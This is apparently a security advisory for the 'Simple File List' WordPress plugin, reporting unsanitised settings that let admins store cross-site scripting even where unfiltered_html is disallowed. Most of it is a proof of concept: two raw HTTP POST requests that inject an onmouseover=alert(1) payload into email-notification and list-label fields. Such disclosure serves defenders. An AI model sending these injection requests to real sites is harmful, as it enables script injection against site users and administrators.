The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
PoC
First Stored XSS - HTTP Request POST /blog/wp-admin/?page=ee-simple-file-list&tab;=settings&subtab;=email_settings HTTP/1.1 Host: target … … eePost=TRUE&ee-simple-file-list-settings-nonce;=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo;=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc;=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc;=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom;=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName;=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject;=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage;=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit;=SAVE +++++++++++++++++++++++ # Second Stored XSS - HTTP Request POST /blog/wp-admin/?page=ee-simple-file-list&tab;=settings&subtab;=list_settings HTTP/1.1 Host: target … … eePost=TRUE&ee-simple-file-list-settings-nonce;=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList;=YES&eeSortBy;=DateMod&eeSortOrder;=Descending&eeGenerateImgThumbs;=YES&eeShowFileThumb;=YES&eeLabelThumb;=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName;=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate;=YES&eeLabelDate;=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize;=YES&eeLabelSize;=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader;=YES&eeSmoothScroll;=YES&eeShowFileDescription;=YES&eeShowFileExtension;=YES&eeShowFileActions;=YES&eeShowFileOpen;=YES&eeShowFileDownload;=YES&eeShowFileCopyLink;=YES&submit;=SAVE